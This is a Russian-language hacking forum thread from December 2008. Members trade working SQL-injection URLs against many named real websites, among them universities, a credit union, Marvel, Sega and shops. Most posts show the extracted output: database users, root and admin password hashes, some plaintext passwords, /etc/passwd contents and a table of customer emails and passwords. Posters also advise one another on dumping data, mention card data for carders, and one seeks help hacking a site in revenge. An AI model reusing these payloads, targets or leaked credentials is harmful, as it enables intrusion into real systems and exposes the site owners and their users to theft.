slava@localhost:imei
localhost:root:*2679BA488B8CF696590C7C1D5180438776 1ECA94
Вас посодят :D
PageRank: 6 тИЦ: 70
http://www.accuracy.org/article.php?articleId=-1+union+select+concat_ws(0x2f,version(),user(),dat abase())--
5.0.67-log/accuracy_w@209.68.4.96/accuracy_accuracy
.us
http://laneuse.ci.minneapolis.mn.us
http://laneuse.ci.minneapolis.mn.us/closure.php?pn=-1+union+select+1,2,3,version(),5+from+users--
version: 5.0.45
http://laneuse.ci.minneapolis.mn.us/closure.php?pn=-1+union+select+1,2,3,concat_ws(login,0x3a,password ),5+from+users--
Login : pass
jason:566cae743de1911e (MySQL type, расшифровать не удалось)
http://www.turkuaz.us
http://www.turkuaz.us:80/news_det.php?newsId=1333&catId=-32+union+select+1,version(),3,4--
version: 4.1.22
user: turkuaz-us@89.106.12.59
Подобрал единственную таблицу turkuazus.customers, но дальше подроб не пошел (...
http://www.mugama.com
http://www.mugama.com/profile.php?recordID=-1+union+select+1,version(),3,4,5,6--
version: 5.0.51a-community
http://www.mugama.com/profile.php?recordID=-1+union+select+1,concat_ws(user_name,0x3a,user_pas sword),3,4,5,6+from+tbl_user--
admin:43e9a4ab75570f5b:admin
Octave_Parango
17.12.2008, 16:41
http://www.crmchealth.org/thefoundation/news.php?id=-13+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database())/*
version: 5.0.30-Debian_1-log
user: mma@localhost
database: crmc
The matrix
17.12.2008, 22:09
слепая(Subquery returns more than 1 row)
http://www.nightnday.org/detail.php?list_id=1213%20and%20if(ascii(substring ((select%20concat(version(),char(58),user())),1,1) )>=1,(select%201%20union%20select%202%20),0)--
4.0.27-max-log:irentedit@68.178.232.59
pr=4
Jokester
17.12.2008, 22:37
слепая(Subquery returns more than 1 row)
http://www.nightnday.org/detail.php?list_id=1213%20and%20if(ascii(substring ((select%20concat(version(),char(58),user())),1,1) )>=1,(select%201%20union%20select%202%20),0)--
4.0.27-max-log:irentedit@68.178.232.59
pr=4
Угу . слепая, из 19 полей 17 выводится :D
http://www.nightnday.org/detail.php?list_id=-1573+union+select+1,2,3,4,5,concat_ws(0x3a,User(), Database(),Version()),7,8,9,0,11,12,13,14,15,16,17 ,18,19/*
И ветка пятая, а не четвёртая
atom_nightnday@localhost:nightnday:5.0.22
kolenwal
18.12.2008, 01:40
http://citycarclub.us/news.php?id_news=-1+union+select+1,2,concat(version(),char(58),user( ),char(58),database()),4/*
4.0.20-log:wwwadmin@localhost:ccc_en
Есть доступ к mysql.user
http://citycarclub.us/news.php?id_news=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(conca t(user,char(58),password),0x71),0x71)+from+mysql.u ser+limit+0,1/*
http://felinewww.com/report.php?id=-877+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21--
4.1.22-standard
PR 4
kolenwal
18.12.2008, 23:42
http://www.audi.co.at/news.php?newsid=-631+union+select+1,2,3,concat(version(),char(58),u ser(),char(58),database()),5,6,7,8,9,10,11,12,13,1 4
4.0.18-log:audiat@amelie.szg.porsche.co.at:audiatdb
The matrix
19.12.2008, 02:49
maxygen.com
PR 6
http://maxygen.com/newsview.php?listid=999+union+select+1,2,3,4,5,6,7 ,8,9,10,11,concat(user,0x3a,password,0x3a3a3a,host ),13,14,15,16,17,18,19,20,21,22,23+from+mysql.user/*
root:55755cfc38918d75:::localhost
root:55755cfc38918d75:::93763-app1.www.desantisbreindel.com
55755cfc38918d75:Brein950
p.s Как видно можно подрубиться удаленно под рутом к бд. Сам не пробовал...
В общем ловите Халявку
The matrix
Не все так просто. Этой скуле уже год где то наверное) и никто дальше не продвинулся) .. подключится удаленно нельзя там. А дир под запись доступных нет.
Кроме того там есть php инклюдинг совершенно простой, и читать все файлы на серваке можно, но ничего с этим не сделаешь(( Даже в админку нельзя зайти, пароль и пасс почему то не подходит(( видимо с определнного ip только можно.. хотя хз..
--skipped--
masternet
19.12.2008, 11:58
http://www.lawfirm.ru/article/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(char(32,45,32), version(),user(),database()),25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41--
http://tibetska-medicina.cz/aktuality.php?cislo=-26'+union+select+1,user(),version(),concat_ws(':', username,password),5,6+from+users/*
karlos:kunes1
http://www.bigbuilding.com.ua/articleview.php?id=-1+union+select+1,version(),3,4,user(),6,group_conc at(table_name+separator+0x0a),8,9,10+from+informat ion_schema.tables/*
http://www.bigbuilding.com.ua/articleview.php?id=-1+union+select+1,version(),3,4,user(),6,concat(log in,0x0a,password),8,9,10+from+login+limit+0,1/*
mythical:mistake
и кривая админка конечно же в /admin/ находиться....
http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,version(),4,5,6,7,8,9/*
4.0.25-standard
PR 5
http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,concat(user,0x3b,password),4,5 ,6,7,8,9+from+mysql.user/*
root;14471e9057c154d6
http://www.jurnal.org/articles.php?rub=ekon'+union+select+1,2,version(), user(),5,6+limit+160,100/*
http://www.top-manager.ru/?a=1&id=-1+union+select+version(),concat_ws(0x0a,login,pass wd),3,4,user(),6,7,8+from+users+limit+0,1/*
http://www.top-manager.ru/?a=1&id=-1+union+select+version(),concat_ws(0x0a,username,p asswd),3,4,user(),6,7,8+from+adm+limit+0,1/*
tm mw3p2dfv
masternet
20.12.2008, 00:49
http://www.arconline.co.uk/news-story.php?id=-1+union+select+1,load_file(0x2f6574632f70617373776 4),3,4,5,6,7,8,9--
http://www.arconline.co.uk/news-story.php?id=-1+union+select+1,unhex(hex(group_concat(table_name ))),3,4,5,6,7,8,9+from+information_schema.tables--
http://www.arconline.co.uk/news-story.php?id=-1+union+select+1,unhex(hex(group_concat(column_nam e))),3,4,5,6,7,8,9+from+information_schema.columns +where+table_name=0x3132616c6c5f61646d696e--
spherics
20.12.2008, 00:57
Пробежались по магазинам!
http://mediacomp.ru/?action=sub_kat&top_kat=-2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT( 0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Da tabase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64) ,0x71),0x71)/*
Database Version: 4.1.18-standard
Database name: db_mediacomp
User name: mediacomp@localhost
http://www.stereophones.ru/comments.php?id=123+union+select+1,2,concat_ws(0x3 a3a,version(),user(),database()),4,5--&model_name=Yamaha%20RH5MA
version:5.0.67-log
user:u45585@10.10.153.188
database:u45585
Getting Data from table mail (493 Rows) from database u45585
Fields email:status:id:pass
[1]:schelin@rol.ru:0:5:9kSA4wHn
[2]:dimik@dimik.ru:0:15:4FfNS]D?M
[3]:zed-dead@inbox.ru:1:6:Y3dD]oUq
[4]:Leon@dti.iks.ru:1:7:i?uNNF;Yb
[5]:konovalenkoe@list.ru:1:8:h_`_6Q1T
[6]:e-stat@mail.ru:1:9:P7?5CFUPa
[7]:serbv1@rambler.ru:0:10:ZmQtGW
[8]:eros433@ztel.ru:1:11:yCdW_>];
[9]:mvv@metib.ru:1:12:are2@k
[10]:maxx@mks.ua:1:13:C7t^pBm
[11]:ib1969@mail.ru:1:14:Y1^fq5g7g
[12]:lie777@list.ru:1:16:vUJBWZa_l
State.hi.us - пр 7
http://www.state.hi.us/sfca/artmuseum.php?article_id=-25+union+select+1,2,3,4,5,6,7,version(),9,10/*
xyz разкрутиш )
http://elftor.com/elftor.php?number=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
http://www.frutonyanya.ru/php/news.php?n=25&c=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24/*
хз, подобрал точно, но ничего не выводится о_О
Всё там выводится:
Db Version: 4.1.22-log
Db name: frutony3_fn
UserName: frutony3_fn@localhost
-=Razor=-
21.12.2008, 11:45
http://www.thisspartanlife.com/index.php?id=-999+union+select+1,concat_ws(char(32,45,32),%20ver sion(),user(),database()),3,4--
5.0.67-community - tsl_admin@localhost - tsl_admin
ТИЦ:30
PR:5
======
http://www.mmdb.ru/index.php?action=perf_by_genre&id_genre=-1033+union+select+1,version()/*
Version: 4.1.22-log
database: wwwmmdbusersru
user: mmdb@localhost
ТИЦ:40
PR: 5
======
http://www.parisbeaute.ua/articles/article.phtml?id=-7'+union+select+concat_ws(char(32,45,32),%20versio n(),user(),database()),2,3,4/*
4.1.22 - u_parisbeaut@localhost - parisbeaute
ТИЦ: 30
PR: 2
======
spherics
21.12.2008, 18:19
http://www.belexpo.by/ru/news/2008/12/11/125.html?template=20+UNION+SELECT+1,2,AES_DECRYPT( AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Vers ion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x78 73716C696E6A656E64),0x71),0x71),4,5--
Database Version: 4.1.16-max
Database name: belexpo
User name: belexpo@localhost
http://www.lekar.by/press/articles/23.html?template=20+union+select+1,2,concat_ws(0x3 a3a,version(),user(),database()),table_name,5+from +information_schema.tables+limit+40,100--
5.0.67-community
lekarby_cms@localhost
lekarby_cms
name не смог вытянуть может подскажете как
email admin@lekar.by
password 4722c00d0d47009e пароль : 1976
Кредитная организация.
www.iccreditunion.org
http://www.iccreditunion.org/news/index.php?id=-53+union+select+1,concat_ws(0x3A3a,version(),datab ase(),user()),3,4,5/*
4.1.22-standard
iccredit_icdb
iccredit_ensky@localhost
PHP код:
http://www.thisspartanlife.com/index.php?id=-999+union+select+1,concat_ws(char(32,45,32),%20ver sion(),user(),database()),3,4--
5.0.67-community - tsl_admin@localhost - tsl_admin
ТИЦ:30
PR:5
http://www.thisspartanlife.com/admin/
Adminname: Damian
Password: admin
-m0rgan-
22.12.2008, 05:12
http://www.footballfoundation.com/news.php?id=-939+union+select+convert(concat_ws(0x3a,user,passw ord)%20using%20latin1),2,3,4,5,6,7+from+mysql.user--
логин/пасс:
root:1ca8d68529746826
Это скуля была на 5какой то странице,но она была не раскручена, так что не сочтите за баян...
------------------------------------------------------
http://www.artmalik.com/gallery/gallery.php?id=9999999+union+select+concat_ws(0x3a ,login,pass),2+from+admin--
логин/пасс:
ahmedrbg:lveLCEiw
------------------------------------------------------
The end!
"Эксклюзивные номера всех мобильных операторов Украины"
http://businessnumbers.com.ua/auction.php?act=viewone&id=-1+union+select+1,2,3,4,5,6,7--
5-ая ветка.
[0]:guest:P9[ic69fb50877346705c3b6d792b6148757
[1]:admin:Cg6Q4e86442ca656f1ab932a5dbb5bf6ff22
http://www.uni-hannover.de (тИЦ: 950, pr: 7 )
http://www.uni-hannover.de/en/aktuell/online-aktuell/index.php?rubrik=8%20union%20select%20database(),2 ,3,4,5,6,7,8%20from%20User+--+
-=Razor=-
22.12.2008, 18:23
http://www.pascucci.ru/index.php?id=-99999999+union+select+1,2,3,concat_ws(version(),da tabase(),user()),5,6,7,8,9,10,11,12,13,14,15/*
З.Ы
westside, там нет скули...
Thrasher88
22.12.2008, 18:30
angara-telecom.ru - интернет-провайдер :)
http://angara-telecom.ru/comments.php?id=1+union+select+1,2,3,4,concat_ws(0 x3a3a,version(),user(),database()),6/*
Version 5.0.41
User angara-telecom@localhost
Database site_angara-telecom_ru
Правда особо интересного ничего там не найти (
www.serieslive.com - буржуйская социальная сеть на переделанном WP, как я понял..
http://www.serieslive.com/news.php?n=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8,9,10,11,12--
Version 5.0.44-log
User root@localhost
Database serieslive4
sega.com - сайт компании SEGA :)
http://help.sega.com/?group=englishuk&t=-1'
Но раскрутить не знаю как :( буду благодарен если кто подскажет..
http://www.mcaleesemarine.com/boat-spec.php?id=0306076+Union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59 ,60/*
блинд..
http://www.mcaleesemarine.com/boat-spec.php?id=0306076+Union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59 ,60/*
блинд..
херасе блинд! очень даже зоркая, я бы сказал:
http://www.mcaleesemarine.com/boat-spec.php?id=-0306076+Union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55,56,57,58,59,60/*
kolenwal
23.12.2008, 01:42
http://aofco.com/new/more.php?productID=1+union+select+1,2,concat(versi on(),char(58),user(),char(58),database())
5.0.67-community-log:audiobox_garrett@localhost:audiobox_aof
Ловим эдушики =)
http://review.antioch.edu/detail.php?id=815+union+select+1,2,version(),4,5,6 ,7/*
http://french.berkeley.edu/news/news_events_ind.php?id=-53+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
http://www.gsd.umn.edu/article.php?id=-189+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16--
+
PR 6
http://www.northwestu.edu/news/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--
5.0.45-community-nt
+
PR4
http://www.ambassadors.edu/About/news.php?id=-63+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--
5.0.67-log
+
PR5
http://vl2.gallaudet.edu/news.php?id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
5.0.51a-community-nt
Thrasher88
23.12.2008, 13:43
konsultant.ru - страховая компания
http://konsultant.ru/modules/publication/category.php?id=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5--
5.0.67-log::u96341@10.10.223.72::u96341
Народ, я в sql inj новичёк, на этом сайте http://hyip365.net с лева есть форма поиска я ввожу туда xss "><script>alert('alert')</script> и выдаёт sql error. Помогите его взломать, админ сайта хакер, убил мой сайт, админ или американец или китаец, народ, покажите ему как русские хакеры взламывают!
Я над ним уже немного поработал, многие ссылки уже не работают.... :)
тут скл-инъекция:
'=0) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,version(),30,31,32/*
версия 4.1.22-max-log
а дальше - сами....
spherics
23.12.2008, 15:18
Что то мне подсказывает что за такое и схлопотать можно! -)
В общем бомбочка на десерт.
http://www.marvel.com/wallpaper/?id=17+union+select+1,concat_ws(0x3a3a,version(),u ser(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 ,33,34,35,36,37--
Database Version: 5.0.45
Database name: marvel_content
User name: marvel@192.168.100.3
тИЦ 700
PR 7
Database [catalog]
Database [catalog_transport]
Database [coty]
Database [coverconcepts]
Database [cyos]
Database [digitalcomics]
Database [exact_target]
Database [facebook]
Database [forum]
Database [games]
Database [marvel]
Database [marvel_content]
Database [marvel_toys]
Database [marvelkids]
Database [toybiz]
Database [universe3]
Database [universe4]
Database [users]
Там такая база чтобы открыть у меня трафа ушло на 280 метров.
Getting Data from table marveladmin_users ( Rows) from database marvel
Fields admin_id:member_name:password
[1]:2:editors:edit_this
[2]:3:dcarr:c0@Rs@1R
[3]:4:jboyle:b!1Nk0nc3
[4]:5:jyoung:cuR7@1ns
[5]:6:jgrunw:7huNd3R
[6]:7:scresp:71gR35%
[7]:8:ootiek:kuR015@n
[8]:9:dweins:fR@nk3n
[9]:10:justjg:wH7n07
[10]:11:pacer:h0m3R
Далее для кардеров это просто рай -)
spherics
23.12.2008, 16:13
Trasher88 не там крутишь смысла особого не вижу напрямую глянь -)
http://www.sega.com/games/?g=239&v=1062+UNION+SELECT+1,2,3,CONCAT(0x7873716C696E6A6 26567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A 2F,User(),0x7873716C696E6A656E64),5,6,7,8,9,10--
Database Version: 5.0.58-enterprise-gpl-log
Database name: segapass
User name: frontend@172.16.24.8
тИЦ = 600
PageRank = 7
Прикольный вывод:
http://www.playsega.co.uk/games/?action=listByGenre>=2+union+select+user(),2,3+limit+10,10--
5.0.58-enterprise-gpl-log
frontend@172.16.24.21
playsega
http://www.playsega.co.uk/games/?action=listByGenre>=2+union+select+concat_ws(0x3a3a,user,password), 2,3+from+mysql.user--
root *344451511741E0CC0B73A39418BAFF52CAB438B2
Dj-Matrix
23.12.2008, 19:40
Во нате:
http://www.xxx.ru/index.php?res=1280&action=anketa&country=-1+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,31,32,33,34,35,36,37,38,39/*
4.1.22
Нашол только табличку users
PR4
http://d3162.u24.comservers.net/news.php?id=2+union+select+1,version(),3,4,5,6,7,8 ,9--
4.0.26-standard
+
PR5
http://www.sistersofprovidence.net/news.php?id=-26+union+select+version(),2,3--
4.0.24
+
PR6
http://www.privatizationbarometer.net/news.php?id=-15793+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,version()--
4.1.11-Debian_4sarge8-log
+
http://alliance.gloderworks.net/news.php?ID=-119+union+select+1,version(),3,4,5,6,7,8,9,10,11--
5.0.67
spherics
23.12.2008, 23:13
http://www.mobihod.ru/news_2.0.php?detail=-128+union+select+1,2,3,4,5,concat_ws(0x3a3a,versio n(),user(),database()),7--
Version:5.0.51a-log
User:h000175_1_1@localhost
database:h000175_1
http://www.master-shin.ru/detail_news.php?ID=-390+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,vers ion(),user(),database())--
5 5.0.51a-log
h000163_1_1@localhost
d003045_1
http://www.agsk.ru/index.php?page=0&catalog=5+union+select+1,2,3,4,concat_ws(0x3a3a,ve rsion(),user(),database()),6,7,8,9,10--
5.0.58-log
agronom@localhost
agronom
Все работы от www.renessans-studio.ru
Всё под скулями.
mailbrush
23.12.2008, 23:15
З.Ы
westside, там нет скули...
Есть...
http://www.pascucci.ru/index.php?id=-99999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15/*
kolenwal
24.12.2008, 01:13
http://www.sigames.com/downloads.php?type=view&id=20999+union+select+aes_decrypt(aes_encrypt(vers ion(),0x71),0x71),2,aes_decrypt(aes_encrypt(user() ,0x71),0x71),aes_decrypt(aes_encrypt(database(),0x 71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17/*
4.1.13-standard:si_admin@62.73.186.72:sigames_v2
http://www.sigames.com/downloads.php?type=view&id=20999+union+select+user,2,password,4,5,6,7,8,9, 10,11,12,13,14,15,16,17+from+mysql.user+limit+0,1/*
Есть доступ к mysql.user
http://www.sigames.com/downloads.php?type=view&id=20999+union+select+load_file('/etc/passwd'),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+f rom+mysql.user/*
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
stan:x:1000:100::/home/stan:/bin/bash
jason:x:1001:100::/home/jason:/bin/bash
Debian-exim:x:103:103::/var/spool/exim4:/bin/false
mysql:x:1002:104::/home/mysql:
bb:x:1003:105::/home/bb:
hobbit:x:1004:106:Hobbit user:/usr/lib/hobbit:
У юзера есть права на чтение файлов но из веб дир вывести ничего не получилось.
Может у кого чего иполучится.Удачи!
-=Razor=-
24.12.2008, 01:46
http://www.7samuraev.ru/crash/pic.php?id=-135+union+select+1,2,3,concat_ws(0x3a3a,user,passw ord),5,6,7+from+mysql.user/*
root::*B80F079A936E4FCA95C38E7313DC13A6352F34DB
Тиц:180
PR: 4
Version: 4.1.21
database: 7samuraev
user: root@localhost
root::*B80F079A936E4FCA95C38E7313DC13A6352F34DB
Тиц:180
PR: 4
Version: 4.1.21
database: 7samuraev
user: root@localhost
http://www.7samuraev.ru/crash/pic.php?id=-135+union+select+1,2,3,concat_ws(char(32,45,32),na me,pass,email),null,6,7+from+users+limit+7096,1/*
Подскажите, как раскрутить?? не получается выявить кол-во полей :(
Это не скуля..
Есть...
http://www.pascucci.ru/index.php?id=-99999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15/*
Всё правильно сказал -=Razor=-, нету там скули. Вы про разные сайты говорите.
Перечитай внимательно.
__________________________________________________ _______
"Компания КИТ. "
"Надежны во всём!"
http://www.kitcom.ru/goods/?gm=-1+union+select+1,2,3+from+mysql.user--
root : 2b8abcb448fbc2f9 : wwwsql1
Так же есть табличка - users.
http://innovic.com.au/index.php?option=com_ilink&task=viewCateg&Itemid=153&categ_id=-1+union+select+concat(username,0x3a,password)+from +jos_users/*
Самописный (видимо) компонент для CMS Joomla :(
md5($pass.$sault)
Lee:8599fc50c533955c5e68491fd4f43098:zybkP1wPpEEJy o68
http://www.labo-bayern.de/index.php?option=com_mylink&Itemid=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(usernam e,0x3a,password),12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28+from+mos_users+limit+1,1/*
Аналогично записи выше, однозначна самописный компонент для CMS Mambo :(
md5
admin:19263790dd9a16266048f800b031c400
http://www.globalresearch.ca/index.php?context=va&aid=11426+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,concat_ws(char(58),user(),version(),d atabase()),35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52+limit+1,1/*
Version 5.0.24
Интересный вывод =)
I love this game
24.12.2008, 15:56
Антибоян не досутпен, если вдруг будет повтор сообщите!
_http://vvlaw.com.ua/index.php?id=-28+union+select+version(),2,3--
5.0.51a-community vvlawnet_user@localhost
---------
_http://www.heimlichinstitute.org/page.php?id=-34+union+select+1,2,3,4--
---------
_http://www.canyonchasers.net/maps/results.php?id=-21+union+select+1,version(),3,4,user(),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24--
3-cc_php@localhost | 5.0.67-community
admin:a468fb
_http://www.canyonchasers.net/maps/results.php?id=-21+union+select+1,version(),3,4,user(),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24--
3-cc_php@localhost | 5.0.67-community
admin:a468fb
Можно еще так )
http://www.canyonchasers.net/maps/results.php?id=-1%20UNION%20ALL%20SELECT%20Null,concat(USER_LOGIN, %200x3a,%20USER_PASS),USER_EMAIL,Null,ID,Null,Null ,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null ,Null,Null,Null,Null,Null,Null,Null%20FROM%20wp_us ers--
Dr.Strangelove
25.12.2008, 00:59
Кому интересно - переберите столбцы
http://www.sovtest.ru/publication.php?id=999999999+union+select+1,id,3,4 ,5,6,7,8+from+member
http://icisa.info/news/news.php?id=-9+union+select+1,2,3,version(),5,6,7,8--
5.0.51a-community
+
PR5
http://www.downtowncrossing.org/shop/shop.php?id=-103+union+select+1,concat_ws(0x3a,username,passwor d),3,4+from+admin--
+
http://www.plaza-shopping.com/shop.php?id=-12+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18--
4.0.27-max-log
Dr.Strangelove
25.12.2008, 15:35
Херстияне...правильные и славные :D
http://www.hram-evenkya.ru/fnews2.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(user name,0x3a,user_password),13,14,15,16,17,18+from+hr amevenkyaru_forum.phpbb_users+limit+1,1
edu
http://users.design.ucla.edu/~ysohama/item.php?id=-3+union+select+1,2,3,4,version(),6,7,8--
5.0.45
I love this game
25.12.2008, 18:08
_http://www.latvia360.lv/pilseta_EN.php?ID=-31+union+select+1,2,version(),user()--
5.0.41-community-log
--------
_http://www.lcoastpress.com/book.php?id=-41+union+select+1,version(),user(),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20--
4.1.22
lcpdb@localhost
--------
_http://www.flylikebrick.com/playmovie.php?id=-43+union+select+1,2,3,4,version(),user(),7,8,9,10, 11,12,13--
5.0.51a
flylikebrick@77.232.72.45
-------
_http://www.tokaiguitar.de/produktdetail.php?id=-18+union+select+1,version(),user(),4,5,6,7,8--
5.0.32-Dotdeb_1.dotdeb.1-log
web562@localhost
http://vtorgrad.ru/tovar.php?id=495&tid=80203+union+select+1,2,3,4,5,6,7,8,9,10,11,12, version(),14,15,16,17,18,19,20,21,22,23,24,25/*
5.0.32-Debian_7etch5
тиц: 30 пр: 4
http://www.cifracenter.ru/tovar.php?ID=7439+union+select+1,2,3,4,5,6,7,8,9,1 0,11--
5.0.67-log
http://www.rp.delo.ua/tovar.php?id=5179+union+select+1,2,3,4,5,version() ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34/*
5.0.45-community
тиц: 30 пр: 4
http://www.mirbatareek.ru/tovar.php?ID=156+union+select+1,2,version(),4,5,6, 7,8,9,10,11,12,13--
5.0.67-log
тиц: 20 пр: 4
http://www.coolerok.ru/tovar.php?tovar=9602'+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15/*
пр: 3
http://www.ventasport.ru/tovar.php?id=11+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18/*
тиц: 40 пр: 4
http://telax.ru/tovar.php?ID=300+union+select+1,2,3,4,5,6,7,8,9,ve rsion(),11,12,13--
5.0.67-log
тиц: 10 пр: 2
Trading Company
www.advicetrade.com
http://www.advicetrade.com/Wizards/story.php?id=-80+union+select+1,2,3,4,5,6,concat_ws(0x3A3a,versi on(),database(),user()),8,9,10,11,12,13--
5.0.60-log::advicetrade::advicetrade@localhost
Есть много интересного (сс тоже присутствуют))
Дампьте сами, версия пятая.
Свежак!
С наступающим!
I love this game
26.12.2008, 16:50
_http://www.remsoft.com/news.php?id=-22+union+select+version()--
4.1.22-community-nt-log
--------
_http://www.spencerclarke.com/oc_newsitem.php?id=-32+union+select+1,2,3,4,5--
--------
_http://www.optometry.co.uk/newsview.php?id=-22+union+select+1,version(),3,4,5,6,7,8,9,10--
5.0.51a-community-log
--------
_http://www.widescreenreview.com/blog_detail.php?id=-23+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16--
4.1.22-standard
http://www.sottera.ru/tovar.php?ID=14801+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13--
5.0.67-log
http://www.audiohome.ru/tovar.php?id=129+union+select+1,2,3,4,5,6,7,8,9,10 ,11/*
http://www.osheyniki.ru/tovar.php?id=64+union+select+version(),2,3,4,5/*
4.1.22-standard
тиц: 10
http://www.mksm-kmz.ru/tovar.php?id=-10'+union+select+1,2,3,4,5,6--
тиц: 50 пр: 4
http://www.stanko-nct.ru/tovar.php?id=-152+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13/*
4.1.22-log
тиц: 30 пр: 4
masternet
26.12.2008, 20:23
http://www.planepictures.net/netshow.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10--
4.0.21-Max
http://www.planepictures.net/netshow.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),user ,password),5,6,7,8,9,10+from+mysql.user--
http://www.infocompanies.com/company.php?id=-1+union+select+1,unhex(hex(group_concat(table_name ))),3,4,5,6,7,8,9,10,11,12,13,14,15+from+informati on_schema.tables--
-=Razor=-
26.12.2008, 20:58
http://www.specialradio.ru/sos/index.php?id=-3+union+select+1,version(),3,4,5,6,7,8,9,10/*
Version: 4.1.22
database:wwwspecialradior_specialradio
user: specialr_speci01@node1.hc.ru
ТИЦ:1000
PR: 6
http://www.changeyourrange.com/index.php?id=-3+union+select+version()/*
version: 4.1.20
database: changeyourrangebs
user:emcelwey@localhost
http://sandbagsuppliers.co.uk/index.php?Id=-1+union+select+1,2,concat(version(),user(),databas e()),4,5,6/*
PR: 2
4.1.22-standardsandbags_sand@localhostsandbags_sand
I love this game
26.12.2008, 21:56
_http://www.pcibooks.com/book_info.php?id=-33+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--
4.1.22-log
----------
_http://www.rightwingnews.com/author.php?id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,version(),18,19,20,21,22,23,24,25,26,27--
5.0.67-community
-----------
_http://www.tasouganda.org/newsdetail.php?id=-33+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13--
4.0.24_Debian-10ubuntu2.3-log
-----------
